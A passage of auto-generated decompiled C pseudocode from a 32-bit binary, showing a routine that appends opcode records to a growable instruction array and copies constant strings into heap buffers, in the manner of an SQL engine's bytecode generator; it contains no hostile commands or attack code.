																											 *((intOrPtr*)(_t1147 + 0x10 + _t1492 * 4)) = 0;
																											 *((char*)(_t1704 + 0x6e)) = 0;
																											L221:
																											_v20 = 0;
																											if(_v12 <= 0) {
																												L340:
																												_t1667 =  *(_t1704 + 0xc);
																												_t1148 =  *(_t1704 + 0x10);
																												if(_t1148 > _t1667) {
																													L351:
																													_t1149 =  *(_t1704 + 0x14);
																													 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																													_t1493 = _t1667 + _t1667 * 4;
																													 *((intOrPtr*)(_t1149 + 4 + _t1493 * 4)) = _v8;
																													 *((short*)(_t1149 + _t1493 * 4)) = 0x4f;
																													 *((char*)(_t1149 + 3 + _t1493 * 4)) = 0;
																													 *((intOrPtr*)(_t1149 + 8 + _t1493 * 4)) = 3;
																													 *((intOrPtr*)(_t1149 + 0xc + _t1493 * 4)) = _v56;
																													 *((intOrPtr*)(_t1149 + 0x10 + _t1493 * 4)) = 0;
																													 *((char*)(_t1704 + 0x6e)) = 0;
																													L352:
																													_t1588 =  *(_t1704 + 0x14);
																													_t1494 =  *_t1704;
																													if(_t1588 == 0 ||  *((char*)(_t1494 + 0x1e)) != 0) {
																														E00FA7BC7(_t1494, 0, 0x477140);
																														_t1707 = _t1710 + 0xc;
																													} else {
																														if(_t1667 < 0) {
																															_t1667 =  *(_t1704 + 0xc) - 1;
																														}
																														_t1441 = _t1588 + (_t1667 + _t1667 * 4) * 4;
																														_v44 = _t1441;
																														_t983 = _t1441 + 1; // 0x8458b36
																														E00FA7BC7(_t1494,  *_t983,  *((intOrPtr*)(_t1588 + 0x10 + (_t1667 + _t1667 * 4) * 4)));
																														_t1707 = _t1710 + 0xc;
																														 *((intOrPtr*)(_t1441 + 0x10)) = 0;
																														_t1670 = 0x477140;
																														do {
																															_t1670 = _t1670 + 1;
																														} while ( *_t1670 != 0);
																														_t1503 =  *_t1704;
																														_t1672 = _t1670 - 0x00477140 & 0x3fffffff;
																														_v48 = _t1503;
																														_t986 = _t1672 + 1; // 0x2
																														_t1603 = _t986;
																														if(_t1503 == 0) {
																															L367:
																															_t1000 = _t1603 - 1; // 0x1
																															if(_t1000 > 0x7ffffefe) {
																																_t1442 = 0;
																																_v28 = 0;
																																L379:
																																if(_t1503 != 0) {
																																	 *((char*)(_t1503 + 0x1e)) = 1;
																																}
																																L381:
																																if(_t1442 == 0) {
																																	L383:
																																	_t1175 = _v44;
																																	 *((intOrPtr*)(_t1175 + 0x10)) = _t1442;
																																	 *((char*)(_t1175 + 1)) = 0xff;
																																	L385:
																																	_t1438 =  *(_t1704 + 0xc);
																																	_t1151 =  *(_t1704 + 0x10);
																																	if(_t1151 > _t1438) {
																																		L396:
																																		_t1152 =  *(_t1704 + 0x14);
																																		 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																																		_t1495 = _t1438 + _t1438 * 4;
																																		 *((intOrPtr*)(_t1152 + 4 + _t1495 * 4)) = _a12;
																																		 *((short*)(_t1152 + _t1495 * 4)) = 0x1a;
																																		 *((char*)(_t1152 + 3 + _t1495 * 4)) = 0;
																																		 *((intOrPtr*)(_t1152 + 8 + _t1495 * 4)) = _v8 + 3;
																																		 *((intOrPtr*)(_t1152 + 0xc + _t1495 * 4)) = 0;
																																		 *((intOrPtr*)(_t1152 + 0x10 + _t1495 * 4)) = 0;
																																		 *((char*)(_t1704 + 0x6e)) = 0;
																																		L397:
																																		_t1439 =  *(_t1704 + 0xc);
																																		_t1153 =  *(_t1704 + 0x10);
																																		if(_t1153 > _t1439) {
																																			L408:
																																			_t1154 =  *(_t1704 + 0x14);
																																			 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																																			_t1496 = _t1439 + _t1439 * 4;
																																			 *((intOrPtr*)(_t1154 + 4 + _t1496 * 4)) = _a12;
																																			 *((intOrPtr*)(_t1154 + 8 + _t1496 * 4)) = _v56;
																																			 *((short*)(_t1154 + _t1496 * 4)) = 0x6e;
																																			 *((char*)(_t1154 + 3 + _t1496 * 4)) = 0;
																																			 *((intOrPtr*)(_t1154 + 0xc + _t1496 * 4)) = _v8 + 3;
																																			 *((intOrPtr*)(_t1154 + 0x10 + _t1496 * 4)) = 0;
																																			 *((char*)(_t1704 + 0x6e)) = 0;
																																			goto L409;
																																		}
																																		if(_t1153 == 0) {
																																			_t1157 = 0x33;
																																		} else {
																																			_t1157 = _t1153 + _t1153;
																																		}
																																		_t1668 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1157 + _t1157 * 4 << 2);
																																		_t1707 = _t1707 + 0xc;
																																		if(_t1668 == 0) {
																																			goto L409;
																																		} else {
																																			_t1499 =  *_t1704;
																																			if(_t1499 == 0 || _t1668 <  *((intOrPtr*)(_t1499 + 0xe8)) || _t1668 >=  *((intOrPtr*)(_t1499 + 0xec))) {
																																				_t1161 =  *0x48182c(_t1668);
																																				_t1707 = _t1707 + 4;
																																				_t1500 = _t1161;
																																			} else {
																																				_t1500 =  *(_t1499 + 0xd8) & 0x0000ffff;
																																			}
																																			 *(_t1704 + 0x10) = 0xcccccccd * _t1500 >> 0x20 >> 4;
																																			 *(_t1704 + 0x14) = _t1668;
																																			goto L408;
																																		}
																																	}
																																	if(_t1151 == 0) {
																																		_t1164 = 0x33;
																																	} else {
																																		_t1164 = _t1151 + _t1151;
																																	}
																																	_t1669 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1164 + _t1164 * 4 << 2);
																																	_t1707 = _t1707 + 0xc;
																																	if(_t1669 == 0) {
																																		goto L397;
																																	} else {
																																		_t1501 =  *_t1704;
																																		if(_t1501 == 0 || _t1669 <  *((intOrPtr*)(_t1501 + 0xe8)) || _t1669 >=  *((intOrPtr*)(_t1501 + 0xec))) {
																																			_t1168 =  *0x48182c(_t1669);
																																			_t1707 = _t1707 + 4;
																																			_t1502 = _t1168;
																																		} else {
																																			_t1502 =  *(_t1501 + 0xd8) & 0x0000ffff;
																																		}
																																		 *(_t1704 + 0x10) = 0xcccccccd * _t1502 >> 0x20 >> 4;
																																		 *(_t1704 + 0x14) = _t1669;
																																		goto L396;
																																	}
																																}
																																L382:
																																E00FE7337(_t1442, 0x477140, _t1672);
																																_t1707 = _t1707 + 0xc;
																																 *((char*)(_t1442 + _t1672)) = 0;
																																goto L383;
																															}
																															if( *0x481808 == 0) {
																																_t1442 =  *0x481820(_t1603);
																																_v28 = _t1442;
																																L375:
																																_t1707 = _t1707 + 4;
																																L376:
																																if(_t1442 != 0) {
																																	goto L382;
																																}
																																_t1503 = _v48;
																																goto L379;
																															}
																															_t1178 =  *0x481910;
																															if(_t1178 != 0) {
																																 *0x481850(_t1178);
																																_t1707 = _t1707 + 4;
																																_t1001 = _t1672 + 1; // 0x2
																																_t1603 = _t1001;
																															}
																															E00FAB537(_t1603, _t1603,  &_v28);
																															_t1181 =  *0x481910;
																															_t1707 = _t1707 + 8;
																															if(_t1181 == 0) {
																																_t1442 = _v28;
																																goto L376;
																															} else {
																																 *0x481858(_t1181);
																																_t1442 = _v28;
																																goto L375;
																															}
																														}
																														if( *((char*)(_t1503 + 0x1e)) == 0) {
																															if( *((char*)(_t1503 + 0xda)) == 0 || _t1603 > ( *(_t1503 + 0xd8) & 0x0000ffff)) {
																																goto L367;
																															} else {
																																_t1442 =  *((intOrPtr*)(_t1503 + 0xe4));
																																if(_t1442 == 0) {
																																	goto L367;
																																}
																																 *((intOrPtr*)(_t1503 + 0xdc)) =  *((intOrPtr*)(_t1503 + 0xdc)) + 1;
																																 *((intOrPtr*)(_t1503 + 0xe4)) =  *_t1442;
																																_t1186 =  *((intOrPtr*)(_t1503 + 0xdc));
																																if(_t1186 >  *((intOrPtr*)(_t1503 + 0xe0))) {
																																	 *((intOrPtr*)(_t1503 + 0xe0)) = _t1186;
																																}
																																goto L381;
																															}
																														}
																														_t1187 = _v44;
																														 *((intOrPtr*)(_t1187 + 0x10)) = 0;
																														 *((char*)(_t1187 + 1)) = 0xff;
																													}
																													goto L385;
																												}
																												if(_t1148 == 0) {
																													_t1188 = 0x33;
																												} else {
																													_t1188 = _t1148 + _t1148;
																												}
																												_t1444 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1188 + _t1188 * 4 << 2);
																												_t1710 = _t1710 + 0xc;
																												if(_t1444 == 0) {
																													_t1667 = 1;
																													goto L352;
																												} else {
																													_t1504 =  *_t1704;
																													if(_t1504 == 0 || _t1444 <  *((intOrPtr*)(_t1504 + 0xe8)) || _t1444 >=  *((intOrPtr*)(_t1504 + 0xec))) {
																														_t1192 =  *0x48182c(_t1444);
																														_t1710 = _t1710 + 4;
																														_t1505 = _t1192;
																													} else {
																														_t1505 =  *(_t1504 + 0xd8) & 0x0000ffff;
																													}
																													 *(_t1704 + 0x10) = 0xcccccccd * _t1505 >> 0x20 >> 4;
																													 *(_t1704 + 0x14) = _t1444;
																													goto L351;
																												}
																											} else {
																												goto L222;
																											}
																											do {
																												L222:
																												_t1674 =  *(_t1704 + 0xc);
																												_t1195 =  *(_t1704 + 0x10);
																												if(_t1195 > _t1674) {
																													L233:
																													 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																													_t1196 =  *(_t1704 + 0x14);
																													_t1506 = _t1674 + _t1674 * 4;
																													 *((short*)(_t1196 + _t1506 * 4)) = 0x5e;
																													 *((char*)(_t1196 + 3 + _t1506 * 4)) = 0;
																													 *((intOrPtr*)(_t1196 + 4 + _t1506 * 4)) = 0;
																													 *((intOrPtr*)(_t1196 + 8 + _t1506 * 4)) = _v8 + 3;
																													 *((intOrPtr*)(_t1196 + 0xc + _t1506 * 4)) = 0;
																													 *((intOrPtr*)(_t1196 + 0x10 + _t1506 * 4)) = 0;
																													 *((char*)(_t1704 + 0x6e)) = 0;
																													L234:
																													_t1608 =  *(_t1704 + 0x14);
																													_t1507 =  *_t1704;
																													if(_t1608 == 0 ||  *((char*)(_t1507 + 0x1e)) != 0) {
																														E00FA7BC7(_t1507, 0, 0x475920);
																														_t1710 = _t1710 + 0xc;
																													} else {
																														if(_t1674 < 0) {
																															_t1674 =  *(_t1704 + 0xc) - 1;
																														}
																														_t1451 = _t1608 + (_t1674 + _t1674 * 4) * 4;
																														_v44 = _t1451;
																														_t686 = _t1451 + 1; // 0x8458b36
																														E00FA7BC7(_t1507,  *_t686,  *((intOrPtr*)(_t1608 + 0x10 + (_t1674 + _t1674 * 4) * 4)));
																														 *((intOrPtr*)(_t1451 + 0x10)) = 0;
																														_t1710 = _t1710 + 0xc;
																														_t1452 = 0x475920;
																														do {
																															_t1452 = _t1452 + 1;
																														} while ( *_t1452 != 0);
																														_t1532 =  *_t1704;
																														_t1454 = _t1452 - 0x00475920 & 0x3fffffff;
																														_v48 = _t1532;
																														_t689 = _t1454 + 1; // 0x2
																														_t1634 = _t689;
																														if(_t1532 == 0) {
																															L249:
																															_t703 = _t1634 - 1; // 0x1
																															if(_t703 > 0x7ffffefe) {
																																_t1681 = 0;
																																_v24 = 0;
																																L261:
																																if(_t1532 != 0) {
																																	 *((char*)(_t1532 + 0x1e)) = 1;
																																}
																																L263:
																																if(_t1681 == 0) {
																																	L265:
																																	_t1266 = _v44;
																																	 *((intOrPtr*)(_t1266 + 0x10)) = _t1681;
																																	 *((char*)(_t1266 + 1)) = 0xff;
																																	L267:
																																	_t1445 =  *(_t1704 + 0xc);
																																	_t1198 =  *(_t1704 + 0x10);
																																	if(_t1198 > _t1445) {
																																		L278:
																																		 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																																		_t1199 =  *(_t1704 + 0x14);
																																		_t1508 = _t1445 + _t1445 * 4;
																																		 *((intOrPtr*)(_t1199 + 4 + _t1508 * 4)) = _v8 + 3;
																																		_t1611 = _v36;
																																		 *((short*)(_t1199 + _t1508 * 4)) = 0x59;
																																		 *((char*)(_t1199 + 3 + _t1508 * 4)) = 0;
																																		 *((intOrPtr*)(_t1199 + 8 + _t1508 * 4)) = _t1611;
																																		 *((intOrPtr*)(_t1199 + 0xc + _t1508 * 4)) = _t1611;
																																		 *((intOrPtr*)(_t1199 + 0x10 + _t1508 * 4)) = 0;
																																		 *((char*)(_t1704 + 0x6e)) = 0;
																																		L279:
																																		_t1446 =  *(_t1704 + 0xc);
																																		_t1200 =  *(_t1704 + 0x10);
																																		if(_t1200 > _t1446) {
																																			L290:
																																			 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																																			_t1612 = _a16;
																																			_t1510 =  *(_t1704 + 0x14) + (_t1446 + _t1446 * 4) * 4;
																																			 *((intOrPtr*)(_t1510 + 8)) = _v20 + 1 + _t1612;
																																			 *_t1510 = 0x54;
																																			 *((char*)(_t1510 + 3)) = 0;
																																			 *((intOrPtr*)(_t1510 + 4)) = _t1612;
																																			 *((intOrPtr*)(_t1510 + 0xc)) = _v8 + 3;
																																			 *((intOrPtr*)(_t1510 + 0x10)) = 0;
																																			 *((char*)(_t1704 + 0x6e)) = 0;
																																			L291:
																																			_t1447 =  *(_t1704 + 0xc);
																																			_t1207 =  *(_t1704 + 0x10);
																																			if(_t1207 > _t1447) {
																																				L302:
																																				 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																																				_t1208 =  *(_t1704 + 0x14);
																																				_t1511 = _t1447 + _t1447 * 4;
																																				 *((short*)(_t1208 + _t1511 * 4)) = 0x2a;
																																				 *((char*)(_t1208 + 3 + _t1511 * 4)) = 0;
																																				 *((intOrPtr*)(_t1208 + 4 + _t1511 * 4)) = _v8 + 3;
																																				 *((intOrPtr*)(_t1208 + 8 + _t1511 * 4)) = 0xffffffff;
																																				 *((intOrPtr*)(_t1208 + 0xc + _t1511 * 4)) = 0;
																																				 *((intOrPtr*)(_t1208 + 0x10 + _t1511 * 4)) = 0;
																																				 *((char*)(_t1704 + 0x6e)) = 0;
																																				L303:
																																				_t1448 =  *(_t1704 + 0xc);
																																				_t1209 =  *(_t1704 + 0x10);
																																				if(_t1209 > _t1448) {
																																					L314:
																																					 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																																					_t1513 =  *(_t1704 + 0x14) + (_t1448 + _t1448 * 4) * 4;
																																					 *_t1513 = 0x57;
																																					 *((intOrPtr*)(_t1513 + 4)) = _v20 + 1 + _a16;
																																					_t1215 = _v8 + 3;
																																					 *((char*)(_t1513 + 3)) = 0;
																																					 *((intOrPtr*)(_t1513 + 8)) = _t1215;
																																					 *((intOrPtr*)(_t1513 + 0xc)) = _t1215;
																																					 *((intOrPtr*)(_t1513 + 0x10)) = 0;
																																					 *((char*)(_t1704 + 0x6e)) = 0;
																																					L315:
																																					_t1449 =  *(_t1704 + 0xc);
																																					_t1216 =  *(_t1704 + 0x10);
																																					if(_t1216 > _t1449) {
																																						L326:
																																						 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																																						_t1217 =  *(_t1704 + 0x14);
																																						_t1514 = _t1449 + _t1449 * 4;
																																						 *((short*)(_t1217 + _t1514 * 4)) = 0x90;
																																						 *((char*)(_t1217 + 3 + _t1514 * 4)) = 0;
																																						 *((intOrPtr*)(_t1217 + 4 + _t1514 * 4)) = _v8 + 3;
																																						 *((intOrPtr*)(_t1217 + 8 + _t1514 * 4)) = 0;
																																						 *((intOrPtr*)(_t1217 + 0xc + _t1514 * 4)) = 0;
																																						 *((intOrPtr*)(_t1217 + 0x10 + _t1514 * 4)) = 0;
																																						 *((char*)(_t1704 + 0x6e)) = 0;
																																						L327:
																																						_t1450 =  *(_t1704 + 0xc);
																																						_t1218 =  *(_t1704 + 0x10);
																																						if(_t1218 > _t1450) {
																																							L338:
																																							 *(_t1704 + 0xc) =  *(_t1704 + 0xc) + 1;
																																							_t1219 =  *(_t1704 + 0x14);
																																							_t1515 = _t1450 + _t1450 * 4;
																																							 *((intOrPtr*)(_t1219 + 4 + _t1515 * 4)) = _v8 + 3;
																																							_t1619 = _v36;
																																							 *((short*)(_t1219 + _t1515 * 4)) = 0x59;
																																							 *((char*)(_t1219 + 3 + _t1515 * 4)) = 0;
																																							 *((intOrPtr*)(_t1219 + 8 + _t1515 * 4)) = _t1619;
																																							 *((intOrPtr*)(_t1219 + 0xc + _t1515 * 4)) = _t1619;
																																							 *((intOrPtr*)(_t1219 + 0x10 + _t1515 * 4)) = 0;
																																							 *((char*)(_t1704 + 0x6e)) = 0;
																																							goto L339;
																																						}
																																						if(_t1218 == 0) {
																																							_t1220 = 0x33;
																																						} else {
																																							_t1220 = _t1218 + _t1218;
																																						}
																																						_t1675 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1220 + _t1220 * 4 << 2);
																																						_t1710 = _t1710 + 0xc;
																																						if(_t1675 == 0) {
																																							goto L339;
																																						} else {
																																							_t1520 =  *_t1704;
																																							if(_t1520 == 0 || _t1675 <  *((intOrPtr*)(_t1520 + 0xe8)) || _t1675 >=  *((intOrPtr*)(_t1520 + 0xec))) {
																																								_t1224 =  *0x48182c(_t1675);
																																								_t1710 = _t1710 + 4;
																																								_t1521 = _t1224;
																																							} else {
																																								_t1521 =  *(_t1520 + 0xd8) & 0x0000ffff;
																																							}
																																							 *(_t1704 + 0x10) = 0xcccccccd * _t1521 >> 0x20 >> 4;
																																							 *(_t1704 + 0x14) = _t1675;
																																							goto L338;
																																						}
																																					}
																																					if(_t1216 == 0) {
																																						_t1227 = 0x33;
																																					} else {
																																						_t1227 = _t1216 + _t1216;
																																					}
																																					_t1676 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1227 + _t1227 * 4 << 2);
																																					_t1710 = _t1710 + 0xc;
																																					if(_t1676 == 0) {
																																						goto L327;
																																					} else {
																																						_t1522 =  *_t1704;
																																						if(_t1522 == 0 || _t1676 <  *((intOrPtr*)(_t1522 + 0xe8)) || _t1676 >=  *((intOrPtr*)(_t1522 + 0xec))) {
																																							_t1231 =  *0x48182c(_t1676);
																																							_t1710 = _t1710 + 4;
																																							_t1523 = _t1231;
																																						} else {
																																							_t1523 =  *(_t1522 + 0xd8) & 0x0000ffff;
																																						}
																																						 *(_t1704 + 0x10) = 0xcccccccd * _t1523 >> 0x20 >> 4;
																																						 *(_t1704 + 0x14) = _t1676;
																																						goto L326;
																																					}
																																				}
																																				if(_t1209 == 0) {
																																					_t1234 = 0x33;
																																				} else {
																																					_t1234 = _t1209 + _t1209;
																																				}
																																				_t1677 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1234 + _t1234 * 4 << 2);
																																				_t1710 = _t1710 + 0xc;
																																				if(_t1677 == 0) {
																																					goto L315;
																																				} else {
																																					_t1524 =  *_t1704;
																																					if(_t1524 == 0 || _t1677 <  *((intOrPtr*)(_t1524 + 0xe8)) || _t1677 >=  *((intOrPtr*)(_t1524 + 0xec))) {
																																						_t1238 =  *0x48182c(_t1677);
																																						_t1710 = _t1710 + 4;
																																						_t1525 = _t1238;
																																					} else {
																																						_t1525 =  *(_t1524 + 0xd8) & 0x0000ffff;
																																					}
																																					 *(_t1704 + 0x10) = 0xcccccccd * _t1525 >> 0x20 >> 4;
																																					 *(_t1704 + 0x14) = _t1677;
																																					goto L314;
																																				}
																																			}
																																			if(_t1207 == 0) {
																																				_t1241 = 0x33;
																																			} else {
																																				_t1241 = _t1207 + _t1207;
																																			}
																																			_t1678 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1241 + _t1241 * 4 << 2);
																																			_t1710 = _t1710 + 0xc;
																																			if(_t1678 == 0) {
																																				goto L303;
																																			} else {
																																				_t1526 =  *_t1704;
																																				if(_t1526 == 0 || _t1678 <  *((intOrPtr*)(_t1526 + 0xe8)) || _t1678 >=  *((intOrPtr*)(_t1526 + 0xec))) {
																																					_t1245 =  *0x48182c(_t1678);
																																					_t1710 = _t1710 + 4;
																																					_t1527 = _t1245;
																																				} else {
																																					_t1527 =  *(_t1526 + 0xd8) & 0x0000ffff;
																																				}
																																				 *(_t1704 + 0x10) = 0xcccccccd * _t1527 >> 0x20 >> 4;
																																				 *(_t1704 + 0x14) = _t1678;
																																				goto L302;
																																			}
																																		}
																																		if(_t1200 == 0) {
																																			_t1248 = 0x33;
																																		} else {
																																			_t1248 = _t1200 + _t1200;
																																		}
																																		_t1679 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1248 + _t1248 * 4 << 2);
																																		_t1710 = _t1710 + 0xc;
																																		if(_t1679 == 0) {
																																			goto L291;
																																		} else {
																																			_t1528 =  *_t1704;
																																			if(_t1528 == 0 || _t1679 <  *((intOrPtr*)(_t1528 + 0xe8)) || _t1679 >=  *((intOrPtr*)(_t1528 + 0xec))) {
																																				_t1252 =  *0x48182c(_t1679);
																																				_t1710 = _t1710 + 4;
																																				_t1529 = _t1252;
																																			} else {
																																				_t1529 =  *(_t1528 + 0xd8) & 0x0000ffff;
																																			}
																																			 *(_t1704 + 0x10) = 0xcccccccd * _t1529 >> 0x20 >> 4;
																																			 *(_t1704 + 0x14) = _t1679;
																																			goto L290;
																																		}
																																	}
																																	if(_t1198 == 0) {
																																		_t1255 = 0x33;
																																	} else {
																																		_t1255 = _t1198 + _t1198;
																																	}
																																	_t1680 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1255 + _t1255 * 4 << 2);
																																	_t1710 = _t1710 + 0xc;
																																	if(_t1680 == 0) {
																																		goto L279;
																																	} else {
																																		_t1530 =  *_t1704;
																																		if(_t1530 == 0 || _t1680 <  *((intOrPtr*)(_t1530 + 0xe8)) || _t1680 >=  *((intOrPtr*)(_t1530 + 0xec))) {
																																			_t1259 =  *0x48182c(_t1680);
																																			_t1710 = _t1710 + 4;
																																			_t1531 = _t1259;
																																		} else {
																																			_t1531 =  *(_t1530 + 0xd8) & 0x0000ffff;
																																		}
																																		 *(_t1704 + 0x10) = 0xcccccccd * _t1531 >> 0x20 >> 4;
																																		 *(_t1704 + 0x14) = _t1680;
																																		goto L278;
																																	}
																																}
																																L264:
																																E00FE7337(_t1681, 0x475920, _t1454);
																																_t1710 = _t1710 + 0xc;
																																 *((char*)(_t1681 + _t1454)) = 0;
																																goto L265;
																															}
																															if( *0x481808 == 0) {
																																_t1681 =  *0x481820(_t1634);
																																_v24 = _t1681;
																																L257:
																																_t1710 = _t1710 + 4;
																																L258:
																																if(_t1681 != 0) {
																																	goto L264;
																																}
																																_t1532 = _v48;
																																goto L261;
																															}
																															_t1269 =  *0x481910;
																															if(_t1269 != 0) {
																																 *0x481850(_t1269);
																																_t1710 = _t1710 + 4;
																																_t704 = _t1454 + 1; // 0x2
																																_t1634 = _t704;
																															}
																															E00FAB537(_t1634, _t1634,  &_v24);
																															_t1272 =  *0x481910;
																															_t1710 = _t1710 + 8;
																															if(_t1272 == 0) {
																																_t1681 = _v24;
																																goto L258;
																															} else {
																																 *0x481858(_t1272);
																																_t1681 = _v24;
																																goto L257;
																															}
																														}
																														if( *((char*)(_t1532 + 0x1e)) == 0) {
																															if( *((char*)(_t1532 + 0xda)) == 0 || _t1634 > ( *(_t1532 + 0xd8) & 0x0000ffff)) {
																																goto L249;
																															} else {
																																_t1681 =  *((intOrPtr*)(_t1532 + 0xe4));
																																if(_t1681 == 0) {
																																	goto L249;
																																}
																																 *((intOrPtr*)(_t1532 + 0xdc)) =  *((intOrPtr*)(_t1532 + 0xdc)) + 1;
																																 *((intOrPtr*)(_t1532 + 0xe4)) =  *_t1681;
																																_t1277 =  *((intOrPtr*)(_t1532 + 0xdc));
																																if(_t1277 >  *((intOrPtr*)(_t1532 + 0xe0))) {
																																	 *((intOrPtr*)(_t1532 + 0xe0)) = _t1277;
																																}
																																goto L263;
																															}
																														}
																														_t1278 = _v44;
																														 *((intOrPtr*)(_t1278 + 0x10)) = 0;
																														 *((char*)(_t1278 + 1)) = 0xff;
																													}
																													goto L267;
																												}
																												if(_t1195 == 0) {
																													_t1279 = 0x33;
																												} else {
																													_t1279 = _t1195 + _t1195;
																												}
																												_t1455 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1279 + _t1279 * 4 << 2);
																												_t1710 = _t1710 + 0xc;
																												if(_t1455 == 0) {
																													_t1674 = 1;
																													goto L234;
																												} else {
																													_t1518 =  *_t1704;
																													if(_t1518 == 0 || _t1455 <  *((intOrPtr*)(_t1518 + 0xe8)) || _t1455 >=  *((intOrPtr*)(_t1518 + 0xec))) {
																														_t1283 =  *0x48182c(_t1455);
																														_t1710 = _t1710 + 4;
																														_t1519 = _t1283;
																													} else {
																														_t1519 =  *(_t1518 + 0xd8) & 0x0000ffff;
																													}
																													 *(_t1704 + 0x10) = 0xcccccccd * _t1519 >> 0x20 >> 4;
																													 *(_t1704 + 0x14) = _t1455;
																													goto L233;
																												}
																												L339:
																												_t1517 = _v20 + 1;
																												_v20 = _t1517;
																											} while (_t1517 < _v12);
																											goto L340;
																										}
																										if(_t1146 == 0) {
																											_t1286 = 0x33;
																										} else {
																											_t1286 = _t1146 + _t1146;
																										}
																										_t1684 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1286 + _t1286 * 4 << 2);
																										_t1710 = _t1710 + 0xc;
																										if(_t1684 == 0) {
																											goto L221;
																										} else {
																											_t1533 =  *_t1704;
																											if(_t1533 == 0 || _t1684 <  *((intOrPtr*)(_t1533 + 0xe8)) || _t1684 >=  *((intOrPtr*)(_t1533 + 0xec))) {
																												_t1290 =  *0x48182c(_t1684);
																												_t1710 = _t1710 + 4;
																												_t1534 = _t1290;
																											} else {
																												_t1534 =  *(_t1533 + 0xd8) & 0x0000ffff;
																											}
																											 *(_t1704 + 0x10) = 0xcccccccd * _t1534 >> 0x20 >> 4;
																											_t1585 = _v36;
																											 *(_t1704 + 0x14) = _t1684;
																											goto L220;
																										}
																									}
																								}
																							}
																							if(_t1141 == 0) {
																								_t1301 = 0x33;
																							} else {
																								_t1301 = _t1141 + _t1141;
																							}
																							_t1458 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1301 + _t1301 * 4 << 2);
																							_t1709 = _t1709 + 0xc;
																							if(_t1458 == 0) {
																								_t1666 = 1;
																								goto L196;
																							} else {
																								_t1535 =  *_t1704;
																								if(_t1535 == 0 || _t1458 <  *((intOrPtr*)(_t1535 + 0xe8)) || _t1458 >=  *((intOrPtr*)(_t1535 + 0xec))) {
																									_t1305 =  *0x48182c(_t1458);
																									_t1709 = _t1709 + 4;
																									_t1536 = _t1305;
																								} else {
																									_t1536 =  *(_t1535 + 0xd8) & 0x0000ffff;
																								}
																								 *(_t1704 + 0x10) = 0xcccccccd * _t1536 >> 0x20 >> 4;
																								 *(_t1704 + 0x14) = _t1458;
																								goto L195;
																							}
																						}
																					}
																				}
																				if(_t1136 == 0) {
																					_t1316 = 0x33;
																				} else {
																					_t1316 = _t1136 + _t1136;
																				}
																				_t1461 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1316 + _t1316 * 4 << 2);
																				_t1708 = _t1708 + 0xc;
																				if(_t1461 == 0) {
																					_t1665 = 1;
																					goto L170;
																				} else {
																					_t1537 =  *_t1704;
																					if(_t1537 == 0 || _t1461 <  *((intOrPtr*)(_t1537 + 0xe8)) || _t1461 >=  *((intOrPtr*)(_t1537 + 0xec))) {
																						_t1320 =  *0x48182c(_t1461);
																						_t1708 = _t1708 + 4;
																						_t1538 = _t1320;
																					} else {
																						_t1538 =  *(_t1537 + 0xd8) & 0x0000ffff;
																					}
																					 *(_t1704 + 0x10) = 0xcccccccd * _t1538 >> 0x20 >> 4;
																					 *(_t1704 + 0x14) = _t1461;
																					goto L169;
																				}
																			}
																			if(_t1132 == 0) {
																				_t1323 = 0x33;
																			} else {
																				_t1323 = _t1132 + _t1132;
																			}
																			_t1693 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1323 + _t1323 * 4 << 2);
																			_t1708 = _t1708 + 0xc;
																			if(_t1693 == 0) {
																				_v52 = 1;
																				goto L157;
																			} else {
																				_t1539 =  *_t1704;
																				if(_t1539 == 0 || _t1693 <  *((intOrPtr*)(_t1539 + 0xe8)) || _t1693 >=  *((intOrPtr*)(_t1539 + 0xec))) {
																					_t1327 =  *0x48182c(_t1693);
																					_t1708 = _t1708 + 4;
																					_t1540 = _t1327;
																				} else {
																					_t1540 =  *(_t1539 + 0xd8) & 0x0000ffff;
																				}
																				 *(_t1704 + 0x10) = 0xcccccccd * _t1540 >> 0x20 >> 4;
																				 *(_t1704 + 0x14) = _t1693;
																				goto L156;
																			}
																		}
																		if(_t1130 == 0) {
																			_t1330 = 0x33;
																		} else {
																			_t1330 = _t1130 + _t1130;
																		}
																		_t1694 = E00FBE7D7( *_t1704,  *(_t1704 + 0x14), _t1330 + _t1330 * 4 << 2);
																		_t1708 = _t1708 + 0xc;
																		if(_t1694 == 0) {
																			goto L145;
																		} else {
																			_t1541 =  *_t1704;
																			if(_t1541 == 0 || _t1694 <  *((intOrPtr*)(_t1541 + 0xe8)) || _t1694 >=  *((intOrPtr*)(_t1541 + 0xec))) {
																				_t1334 =  *0x48182c(_t1694);
																				_t1708 = _t1708 + 4;
																				_t1542 = _t1334;
																			} else {
																				_t1542 =  *(_t1541 + 0xd8) & 0x0000ffff;
																			}
																			 *(_t1704 + 0x10) = 0xcccccccd * _t1542 >> 0x20 >> 4;
																			 *(_t1704 + 0x14) = _t1694;
																			goto L144;
																		}
																	} else {
																		_t1543 =  *_t1704;
																		if(_t1543 == 0 || _t1695 <  *((intOrPtr*)(_t1543 + 0xe8)) || _t1695 >=  *((intOrPtr*)(_t1543 + 0xec))) {
																			_t1341 =  *0x48182c(_t1695);
																			_t1708 = _t1708 + 4;
																			_t1544 = _t1341;
																		} else {
																			_t1544 =  *(_t1543 + 0xd8) & 0x0000ffff;
																		}
																		 *(_t1704 + 0x10) = 0xcccccccd * _t1544 >> 0x20 >> 4;
